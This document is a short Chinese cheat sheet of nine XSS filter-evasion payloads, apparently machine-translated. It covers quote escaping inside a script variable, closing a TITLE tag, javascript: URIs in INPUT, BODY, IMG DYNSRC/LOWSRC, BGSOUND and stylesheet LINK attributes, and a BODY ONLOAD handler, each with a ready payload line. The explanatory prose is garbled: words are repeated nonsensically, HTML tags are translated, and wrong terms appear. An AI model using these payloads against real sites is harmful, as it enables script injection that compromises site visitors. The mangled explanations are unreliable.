1.逃离JavaScript逃脱了。 当应用程序编写一些用户信息输出到一个JavaScript如下:<脚本> var一个= " $环境{ QUERY_STRING }”;< /脚本>,你想将你的自己的JavaScript进去但服务器端应用某些引用你可以规避逃到逃离他们的逃避的特质。当这变得注入将读<脚本> var一个= " \ ";警报(“XSS”);/ /”;< /脚本>,最终un-escaping双引号和导致跨站脚本向量开火。使用该方法的定位XSS
代码:\";alert('XSS');//
2.标题标签中结束。这是一个简单的XSS向量<名称>关闭标签,可缩短了恶意跨站脚本攻击
代码:</TITLE><SCRIPT>alert("XSS");</SCRIPT>
3.输入图像
代码:<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
4.BODY image
代码:<BODY BACKGROUND="javascript:alert('XSS')">
5.(BODY tag这种方法,因为它不需要使用任何的基因型的“javascript:”或“<脚本…“完成XSS攻击),你可以把一个空间在等号(“onload = " != " onload = "
代码:<BODY ONLOAD=alert('XSS')>
6.IMG Dynsrc
代码:<IMG DYNSRC="javascript:alert('XSS')">
7.IMG lowsrc
代码:<IMG LOWSRC="javascript:alert('XSS')">
8.BGSOUND
代码:<BGSOUND SRC="javascript:alert('XSS');">
9.STYLE sheet
代码:<LINK REL="stylesheet" HREF="javascript:alert('XSS');">